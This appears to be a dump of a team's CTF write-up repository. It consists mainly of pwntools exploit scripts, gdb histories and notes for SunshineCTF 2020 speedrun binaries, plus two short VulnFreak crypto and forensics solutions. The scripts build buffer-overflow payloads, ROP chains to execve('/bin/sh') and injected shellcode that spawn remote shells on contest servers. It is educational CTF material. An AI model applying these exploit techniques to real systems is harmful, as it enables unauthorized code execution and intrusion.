--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = process('./chall_14')
6 |
7 | p1 = 'abc'
8 |
9 | padding = cyclic_find(0x62616162)
10 | print('padding:', padding)
11 |
12 | binary = ELF('chall_14')
13 | rop = ROP(binary)
14 | binsh = 0x7fffffffd3c0
15 | rop.execve(binsh, 0, 0)
16 | print(rop.dump())
17 |
18 | payload = b'/bin/sh\0'.ljust(padding, b'B')
19 | payload += rop.chain()
20 | payload = encoder.line(payload)
21 |
22 | with open('payload', 'w') as f:
23 | f.write(p1 + "\n")
24 |
25 | with open('payload', 'ab') as f:
26 | f.write(payload)
27 |
28 | sh.recvline()
29 | sh.sendline(p1)
30 |
31 | sh.sendline(payload)
32 | sh.interactive()
33 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/notes.md:
--------------------------------------------------------------------------------
1 | pwndbg> p &__stack_prot
2 | $2 = ( *) 0x6b8ef0 <__stack_prot>
3 |
4 | Gadgets
5 |
6 | 0x0000000000410263: pop rsi; ret;
7 | 0x00000000004158f4: pop rax; ret;
8 | 0x000000000047f401: mov qword ptr [rsi], rax; ret;
9 | 0x0000000000400696: pop rdi; ret;
10 | 0x000000000044c0a9: pop rdx; pop rsi; ret;
11 |
12 | pwndbg> p &__data_start
13 | $1 = ( *) 0x6b90e0
14 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/14/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/14/scrap.py:
--------------------------------------------------------------------------------
1 | # Payload:
2 | # padding
3 | # set __stack_prot to 7
4 | # set RDI to __libc_stack_end
5 | # execute _dl_make_stack_executable
6 | # push shellcode
7 |
8 | stack_prot = 0x6b8ef0
9 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/chall_15:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/chall_15
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/flag.txt:
--------------------------------------------------------------------------------
1 | sun{fart}
2 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30015)
6 | # sh = process('./chall_15')
7 |
8 | sh.sendline('abc')
9 | s = sh.recvline().decode('ascii').split()
10 | buf = int(s[-1], 0) # 0x7fffffffd3da
11 | print('buf:', hex(buf))
12 |
13 | # p[10] == 0xfacade or p[66] == 0xfacade
14 | # 0x5555555547c9: pass exit
15 | # ► 0x5555555547cb ret <0x6176616161756161>
16 | ret_addr_padding = 78
17 |
18 | p = asm(shellcraft.cat('flag.txt')).ljust(66, asm('nop'))
19 | p += p32(0xfacade)
20 | p = p.ljust(ret_addr_padding, b'Z')
21 | p += p64(buf)
22 |
23 | # p = ((b'A' * 10) + p32(0xfacade)).ljust(16, b'Z')
24 | # shcode_offset = len(p)
25 | # print(len(p))
26 | # p = p.ljust(ret_addr_padding, b'B')
27 | # p += p64(buf + shcode_offset)
28 | # p = encoder.line(p)
29 |
30 | # with open('payload', 'w') as f:
31 | # f.write('abc\n')
32 |
33 | with open('payload', 'wb') as f:
34 | f.write(p)
35 |
36 | sh.sendline(p)
37 | print(sh.recvallS(timeout=2))
38 |
39 | # 0x7ffe93518470
40 | # 0x7ffe93518478
41 | # 0x7ffe93518434
42 | # 0x7ffcf95e812a
43 | # 0x7fff99c4a45a
44 | # 0x7fff99c4a46a
45 | # 0x7ffe3820f17a
46 | # 0x7ffe3820f18a
47 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/notes.md:
--------------------------------------------------------------------------------
1 | pwndbg> x/x $rbp-0x3c
2 | 0x7fffffffd3e4: 0x61646161
3 | pwndbg> x/x $rbp-4
4 | 0x7fffffffd41c: 0x61726161
5 |
6 | pwndbg> x/x $rbp-0x3c
7 | 0x7fffffffd3e4: 0x61646161 <- 10
8 | pwndbg> x/x $rbp-4
9 | 0x7fffffffd41c: 0x61726161 <- 66
10 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/15/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/15/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | ni
4 | ni
5 | ni
6 | ni
7 | p $rax
8 | ni
9 | ni
10 | p $rax
11 | ni
12 | p $rax
13 | q
14 | b main
15 | p win
16 | run < payload
17 | ni
18 | q
19 | b main
20 | run < payload
21 | ni
22 | q
23 | b main
24 | run < payload
25 | ni
26 | p $Rax
27 | p $rax
28 | ni
29 | p $rax
30 | ni
31 | ni
32 | ni
33 | ni
34 | ni
35 | p $eax
36 | stack
37 | distance r8 rbp
38 | ni
39 | ni
40 | p $rbx
41 | ni
42 | hex # 0x555555755020
43 | hex 0x555555755020
44 | ni
45 | ni
46 | ni
47 | p $eax
48 | ni
49 | ni
50 | p $eax
51 | ni
52 | p $eax
53 | ni
54 | ni
55 | ni
56 | p $eax
57 | x $rbp-0x54
58 | disassemble main
59 | ni
60 | ni
61 | run < payload
62 | checksec
63 | run < payload
64 | ni
65 | ni
66 | ni
67 | ni
68 | ni
69 | run < payload
70 | ni
71 | ni
72 | p $rbx
73 | p $Rax
74 | p $rax
75 | ni
76 | ni
77 | ni
78 | ni
79 | p $eax
80 | ni
81 | p $rbx
82 | ni
83 | ni
84 | ni
85 | ni
86 | ni
87 | ni
88 | ni
89 | p $eax
90 | ni
91 | p $al
92 | p $eax
93 | p $rb-0x54
94 | x $rbp-0x54
95 | ni
96 | p $eax
97 | nids key
98 | ds key
99 | ds 0x555555755020
100 | q
101 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/chall_16:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/16/chall_16
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30016)
6 | # sh = process('./chall_16')
7 |
8 | def fuck(x):
9 | x = ord(x)
10 | for i in range(0x30, 0x94):
11 | x = x ^ i
12 | return chr(x)
13 |
14 | key = 'Queue epic guitar solo *syn starts shredding*\n'
15 | payload = [fuck(k) for k in key]
16 | payload = "".join(payload)
17 | print(payload)
18 |
19 | sh.sendline(payload)
20 | sh.interactive()
21 |
22 | # payload = 'A' * 45
23 |
24 | # with open('payload', 'w') as f:
25 | # f.write(payload + "\n")
26 |
27 | # 0x555555755020
28 |
29 | # sh.sendline(payload)
30 | # sh.interactive()
31 |
32 | # ► 0x400b9c ret <0x6261616362616162>
33 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/16/payload:
--------------------------------------------------------------------------------
1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | ni
4 | ni
5 | p $eax
6 | ni
7 | ni
8 | ni
9 | ni
10 | ni
11 | hex $esp
12 | hex $rsp
13 | telescope $rbp-0x10
14 | x/i $rsp
15 | x/w $rsp
16 | ctx
17 | ni
18 | p $eax
19 | ni
20 | p $rbp-0xc
21 | p $rsp
22 | x $rbp0xc
23 | x/w $rbp-0xc
24 | x/w $rbp
25 | x/w $rbp-0x10
26 | x/w $rbp-0
27 | x/w $rbp-0xc
28 | checksec
29 | run
30 | b main
31 | run
32 | ni
33 | ni
34 | ni
35 | ni
36 | ni
37 | x/w $rsp
38 | ni
39 | q
40 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/17/a.out
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/chall_17:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/17/chall_17
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 | import subprocess
3 |
4 | sh = remote('chal.2020.sunshinectf.org', 30017)
5 | # sh = process('./chall_17')
6 |
7 | sub_ans = subprocess.check_output('./a.out')
8 | p = sub_ans.decode().strip()
9 | print(p)
10 |
11 | sh.sendline(p)
12 | print(sh.recvall())
13 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/17/test.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main(int argc, char *argv[])
6 | {
7 | time_t t = time(0);
8 | srand(t);
9 | printf("%d\n", rand());
10 | return 0;
11 | }
12 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/a.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/a.out
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/chall_02:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/chall_02
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/main.py:
--------------------------------------------------------------------------------
1 | import pwn
2 |
3 | pwn.context.arch = 'amd64'
4 |
5 | sh = pwn.remote('chal.2020.sunshinectf.org', 30002)
6 | # sh = pwn.process('./chall_02')
7 |
8 | p1 = "A" * 13
9 |
10 | padding = 62
11 | payload = pwn.cyclic(padding) + pwn.p32(0x08048390) + pwn.p32(0x0) + pwn.p32(0x8049610)
12 |
13 | with open('payload', 'w') as f:
14 | f.write(p1 + '\n')
15 |
16 | with open('payload', 'ab') as f:
17 | f.write(payload)
18 |
19 | sh.sendline(p1)
20 | sh.sendline(payload)
21 | sh.interactive()
22 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/notes.md:
--------------------------------------------------------------------------------
1 | *EAX 0x804a000 (_GLOBAL_OFFSET_TABLE_) —▸ 0x8049f10 (_DYNAMIC) ◂— 0x1
2 |
3 | ► 0x804851b call gets@plt
4 | arg[0]: 0xffffc5fe ◂— 0x35390000
5 | arg[1]: 0xffffc64c ◂— '1234567890123\n'
6 | arg[2]: 0x12
7 | arg[3]: 0x804850d (vuln+12) ◂— add eax, 0x1af3
8 |
9 | system addr: 0x08048390
10 |
11 | ret addr offset: 62
12 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/2/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/2/test.c:
--------------------------------------------------------------------------------
1 | #include
2 | int main() {
3 | system("/bin/sh");
4 | return 0;
5 | }
6 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/.gdb_history:
--------------------------------------------------------------------------------
1 | core core
2 | q
3 | b vuln
4 | run
5 | ni
6 | distance $rbp $rsp
7 | ni
8 | ni
9 | ni
10 | ni
11 | info frame
12 | cyclic -l 0x6261616167
13 | cyclic -l 0x62616167
14 | ni
15 | ni
16 | q
17 | core core
18 | q
19 | core core
20 | nearpc 0x7ffc474e17e0
21 | nearpc 0x7ffc474e17e0+100
22 | nearpc 0x7ffc474e17e0+120
23 | nearpc 0x7ffc474e17e0+80
24 | nearpc 0x7ffc474e17e0+20
25 | nearpc 0x7ffc474e17e0+40
26 |
27 | nearpc 0x7ffc474e17e0 80
28 | nearpc 0x7ffc474e17e0 140
29 | bt
30 | ctx
31 | nearpc 0x7ffc474e17e0 180
32 | q
33 | start
34 | main
35 | ni
36 | 1234567890123
37 | ni
38 | s
39 | ni
40 | stack
41 | ni
42 | ni
43 | ni
44 | ni
45 | search /bin/sh
46 | ni
47 | ni
48 | info frame
49 | cyclic -l 0x62626267
50 | cyclic -l 0x62616167
51 | ctx
52 | checksec
53 | q
54 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/chall_03:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/chall_03
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30003)
6 | # sh = process('./chall_03')
7 |
8 | p1 = "A" * 13
9 |
10 | sh.recvline()
11 | sh.sendline(p1)
12 |
13 | s = sh.recvline().decode('ascii').split()
14 | rsp_str = s[-1]
15 | rsp = int(rsp_str, 0)
16 | print(hex(rsp))
17 |
18 | ret_addr_padding = 120
19 | payload = asm(shellcraft.sh()).ljust(ret_addr_padding, asm('nop'))
20 | print(len(payload))
21 | payload += p64(rsp)
22 |
23 | # with open('payload', 'w') as f:
24 | # f.write(p1 + '\n')
25 |
26 | # with open('payload', 'ab') as f:
27 | # f.write(payload)
28 |
29 | sh.sendline(payload)
30 | sh.interactive()
31 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/3/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/3/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/chall_04:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/chall_04
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | binary = ELF('chall_04')
6 |
7 | sh = remote('chal.2020.sunshinectf.org', 30004)
8 | # sh = process('./chall_04')
9 |
10 | win_addr = 0x4005b7
11 |
12 | payload = cyclic(56) + p64(win_addr)
13 |
14 | p1 = "A" * 13
15 |
16 | with open('payload', 'w') as f:
17 | f.write(p1 + '\n')
18 |
19 | with open('payload', 'ab') as f:
20 | f.write(payload)
21 |
22 | sh.recvline()
23 | sh.sendline(p1)
24 |
25 | sh.sendline(payload)
26 | sh.interactive()
27 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/notes.md:
--------------------------------------------------------------------------------
1 | Value of rdx
2 | pwndbg> p $rbp-8
3 | $2 = (void *) 0x7fffffffd418
4 |
5 | We can control the value of `rdx`, so we can call any function.
6 | But how do we specify the parameters? Can we use a ROP chain?
7 |
8 | pwndbg> p system
9 | $3 = {int (const char *)} 0x7ffff7e36f20 <__libc_system>
10 |
11 | pwndbg> print system
12 | $1 = {} 0x4004b0
13 |
14 | pwndbg> search /bin/sh
15 | chall_04 0x4006b8 0x68732f6e69622f /* '/bin/sh' */
16 | chall_04 0x6006b8 0x68732f6e69622f /* '/bin/sh' */
17 | libc-2.31.so 0x7ffff7f78156 0x68732f6e69622f /* '/bin/sh' */
18 |
19 | 0x4005dc lea rax, [rbp - 0x40]
20 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/4/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/4/payload
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/.gdb_history:
--------------------------------------------------------------------------------
1 | q
2 | start
3 | main
4 | ni
5 | ni
6 | si
7 | ni
8 | distance main win
9 | distance &main &win
10 | ni
11 | cyclic 100
12 | cyclic 100
13 | ni
14 | ni
15 | cyclic -l 0x6161616f
16 | q
17 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/chall_05:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/5/chall_05
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/5/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/5/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30005)
6 | # sh = process('./chall_05')
7 |
8 | p1 = "A" * 13
9 | sh.recvline()
10 | sh.sendline(p1)
11 |
12 | s = sh.recvline().decode('ascii').split()
13 | main_addr = int(s[-1], 0)
14 | print('main: ', hex(main_addr))
15 | win_addr = main_addr - 0x13
16 | print('win: ', hex(win_addr))
17 |
18 | # ► 0x5555555547ea call rdx <0x616161706161616f>
19 | padding = cyclic_find(0x6161616f)
20 | payload = cyclic(padding) + p64(win_addr)
21 | print(len(payload))
22 |
23 | # with open('payload', 'w') as f:
24 | # f.write(p1 + '\n')
25 |
26 | # with open('payload', 'ab') as f:
27 | # f.write(payload)
28 |
29 | sh.sendline(payload)
30 | sh.interactive()
31 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | p system
3 | main
4 | nini
5 | ni
6 | checksec
7 | find /bin/sh
8 | search /bin/sh
9 | r2
10 | ctx
11 | ni
12 | ni
13 | ni
14 | ni
15 | cyclic 199
16 | ni
17 | ni
18 | si
19 | distance $rsp $rbp
20 | ni
21 | ni
22 | ni
23 | ni
24 | checksec
25 | ni
26 | ni
27 | ni
28 | ni
29 | ni
30 | p $rdx
31 | reg $rdx
32 | reg rdx
33 | x $rbp-8
34 | hexdump $rb-8
35 | hexdump $rbp-87
36 | hexdump $rbp-8
37 | checksec
38 | ni
39 | ni
40 | ni
41 | checksec
42 | disassemble vuln
43 | disassemble main
44 | run
45 | start
46 | main
47 | ni
48 | ni
49 | ni
50 | ni
51 | ni
52 | si
53 | ni
54 | cyclic 0x64
55 | cyclic 100
56 | ni
57 | ni
58 | ni
59 | q
60 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/chall_06:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/6/chall_06
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/6/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30006)
6 | # sh = process('./chall_06')
7 |
8 | s = sh.recvline().decode('ascii').split()
9 | rsp = int(s[-1], 0)
10 | print('rsp:', hex(rsp))
11 |
12 | # sh_code = asm(shellcraft.sh()).rjust(64, asm('nop'))
13 | sh_code = asm(shellcraft.sh())
14 | sh.sendline(sh_code)
15 |
16 | # ► 0x5555555547a0 call rdx <0x616161706161616f>
17 | padding = cyclic_find(0x6161616f)
18 | print(padding)
19 | payload = cyclic(padding) + p64(rsp)
20 | print(len(payload))
21 |
22 | sh.sendline(payload)
23 | sh.interactive()
24 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/6/notes.md:
--------------------------------------------------------------------------------
1 | ► 0x555555554756 call fgets@plt
2 | s: 0x7fffffffd380 ◂— 0x0
3 | n: 0xc7
4 | stream: 0x7ffff7fac980 (_IO_2_1_stdin_) ◂— 0xfbad2088
5 |
6 | n = 199
7 |
8 | pwndbg> reg rdx
9 | *RDX 0x555555554610 (_start) ◂— xor ebp, ebp
10 |
11 | pwndbg> disassemble vuln
12 | Dump of assembler code for function vuln:
13 | 0x0000555555554768 <+0>: push rbp
14 | 0x0000555555554769 <+1>: mov rbp,rsp
15 | 0x000055555555476c <+4>: sub rsp,0x240
16 | 0x0000555555554773 <+11>: lea rdi,[rip+0xe6] # 0x555555554860
17 | 0x000055555555477a <+18>: call 0x5555555545d0
18 | 0x000055555555477f <+23>: mov rdx,QWORD PTR [rip+0x20088a] # 0x555555755010
19 | 0x0000555555554786 <+30>: lea rax,[rbp-0x40]
20 | 0x000055555555478a <+34>: mov esi,0x64
21 | 0x000055555555478f <+39>: mov rdi,rax
22 | 0x0000555555554792 <+42>: call 0x5555555545f0
23 | 0x0000555555554797 <+47>: mov rdx,QWORD PTR [rbp-0x8]
24 | 0x000055555555479b <+51>: mov eax,0x0
25 | 0x00005555555547a0 <+56>: call rdx
26 | 0x00005555555547a2 <+58>: nop
27 | 0x00005555555547a3 <+59>: leave
28 | 0x00005555555547a4 <+60>: ret
29 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/.gdb_history:
--------------------------------------------------------------------------------
1 | start
2 | main
3 | ni
4 | checksec
5 | ni
6 | telescope rdx
7 | ni
8 | ni
9 | ni
10 | ni
11 | ni
12 | ni
13 | checksec
14 | ni
15 | ni
16 | start
17 | main
18 | ni
19 | checksec
20 | ni
21 | ni
22 | telescope $rbp0xd0
23 | telescope $rbp-0xd0
24 | nini
25 | ni
26 | ni
27 | ni
28 | c
29 | run
30 | start
31 | main
32 | ni
33 | ni
34 | aaaabaaacaaadaaaea
35 | ni
36 | ni
37 | ni
38 | q
39 | run
40 | ls
41 | ls
42 | start
43 | main
44 | ni
45 | ni
46 | ni
47 | ni
48 | ni
49 | ni
50 | ni
51 | p $rbp0xd0
52 | p $rbp-0xd0
53 | telescope $rdx
54 | ctx
55 | telescope $rbp-0xd0
56 | ctx
57 | telescope rdx
58 | p rdx
59 | p $rdx
60 | x/s $Rdx
61 | x/s $rdx
62 | ctx
63 | disassemble main
64 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/chall_07:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/7/chall_07
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/core:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/7/core
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/7/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30007)
6 | # sh = process('./chall_07')
7 |
8 | sh.sendline('fuck')
9 |
10 | sh_code = asm(shellcraft.sh())
11 | sh.sendline(sh_code)
12 |
13 | sh.interactive()
14 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/8/chall_08:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/8/chall_08
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/8/main.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/8/main.py
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/chall_09:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/9/chall_09
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/main.py:
--------------------------------------------------------------------------------
1 | from pwn import *
2 |
3 | context.arch = 'amd64'
4 |
5 | sh = remote('chal.2020.sunshinectf.org', 30009)
6 | # sh = process('./chall_09')
7 |
8 | key = [0x79, 0x17, 0x46, 0x55, 0x10, 0x53, 0x5f, 0x5d, 0x55, 0x10, 0x58, 0x55, 0x42, 0x55, 0x10, 0x44, 0x5f, 0x3a]
9 | text = [chr(k ^ 0x30) for k in key]
10 | print(text)
11 |
12 | payload = "".join(text)
13 | print(payload) # I've come here to
14 |
15 | sh.sendline(payload)
16 | sh.interactive()
17 |
--------------------------------------------------------------------------------
/2020/sunshine_ctf/speedrun/9/payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/sunshine_ctf/speedrun/9/payload
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/4li3n W4nt H3lp/README.md:
--------------------------------------------------------------------------------
1 | # 4li3n W4nt H3lp
2 | **category: Cryptography**
3 | **points: 100**
4 |
5 | ## Description:
6 | >An UFO crashed near the highway Petrol Pump and we find two aliens there they are critically injured and they are requesting for help. But we are not able to understanding their langauge so they write on the paper help us to decode their message.
7 |
NOTE : hf0x01{Decoded_Message} PUT _ BETWEEN MESSAGE
8 |
9 |
10 | ## Solution
11 | >Given file is 
12 |
13 | >So,I searched about different alien languages and found that it is `Elder Futhark` cipher.After decoding cipher that in photo,I got flag.
14 |
15 | hf0x01{AFTER_SOLVING_THIS_YOUR_ARE_ELIGIBLE_TO_JOIN_ANONYMOUS}
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/4li3n W4nt H3lp/chall.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/4li3n W4nt H3lp/chall.PNG
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/README.md:
--------------------------------------------------------------------------------
1 | # Anonymous
2 | **category: Forensics**
3 | **points: 100**
4 |
5 | ## Description
6 | > Anonymous sended it's another message this year. But everyone doesn't know how they send a secret message through this video to their spy can you able to find it.
7 |
8 | ## Solution
9 | We are provided with [mp4](video.mp4) file. Listening it on `3:25` we get some noise. I went to https://www.dcode.fr/spectral-analysis to look for `spectogram` on `3:25` and i got the flag there
10 |
11 | 
12 |
13 | FLAG : `hf0x01{FINALLY_Y0U_G0T_S3CR3T_MESSAg3}`
14 |
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/spectogram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Anonymous/spectogram.png
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Anonymous/video.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/vulnfreak_ctf/Anonymous/video.mp4
--------------------------------------------------------------------------------
/2020/vulnfreak_ctf/Base Fun/chall.txt:
--------------------------------------------------------------------------------
